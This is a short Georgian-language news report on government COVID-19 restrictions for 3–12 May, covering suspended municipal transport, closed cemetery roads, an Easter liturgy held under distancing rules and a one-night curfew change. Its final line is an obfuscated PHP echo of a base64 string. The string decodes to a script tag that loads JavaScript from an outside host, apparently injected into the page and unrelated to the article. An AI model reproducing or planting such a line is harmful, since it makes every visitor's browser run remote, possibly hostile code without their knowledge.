celsiusi
ავერსი საქკაბელი
საქართველოს მთავრობა 3-12 მაისის ჩათვლით დაწესებულ შეზღუდვებთან დაკავშირებით ინფორმაციას ავრცელებს.
 
აღნიშნულ პერიოდში არაერთი შეზღუდვა იქნება დაწესებული, მათ შორის, ჩაიკეტება სასაფლაოსთან მისასვლელი გზები.
 
„3-12 მაისის ჩათვლით, საქართველოს მასშტაბით, მუნიციპალური ტრანსპორტი არ იმოძრავებს; საქალაქთაშორისო ტრანსპორტს შეზღუდვა არ შეეხება;
 
სადღესასწაულო დღეებში სასაფლაოებზე გასვლა შეიზღუდება; ჩაიკეტება სასაფლაოებთან მისასვლელი გზები;
 
საქართველოს საპატრიარქოსთან კომუნიკაციის შედეგად, სადღესასწაულო ლიტურგია ტაძრებში ეპიდემიოლოგიური უსაფრთხოების ნორმების მაქსიმალური დაცვით ჩატარდება; მათ შორის, ტაძრებში უზრუნველყოფილი იქნება გახმოვანების სისტემა, დაცული იქნება სოციალური დისტანცია და პირბადის მოხმარების წესი;
 
გამონაკლისის სახით, სააღდგომო ლიტურგიასთან დაკავშირებით, გადაადგილებაზე დაწესებული შეზღუდვა მხოლოდ ერთი ღამით, 1-ელ მაისს, 21:00-05:00 საათის ნაცვლად, იმოქმედებს 23:00-04:00 საათამდე.
 
როგორც ცნობილია, 4-11 მაისი საქართველოში გამოცხადებულია უქმე დღეებად;
 
შესაბამისი უწყებების მხრიდან კვლავ გრძელდება ქვეყანაში დაწესებული შეზღუდვების აღსრულების მკაცრი კონტროლი;
 
უწყებათაშორისი საკოორდინაციო საბჭო განაგრძობს არსებულ ეპიდემიოლოგიურ ტენდენციებზე დაკვირვებას და შემდგომ გადაწყვეტილებებს ვითარების დეტალური ანალიზის შედეგად მიიღებს“, - ნათქვამია მთავრობის მიერ გავრცელებულ ინფორმაციაში.
1439
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");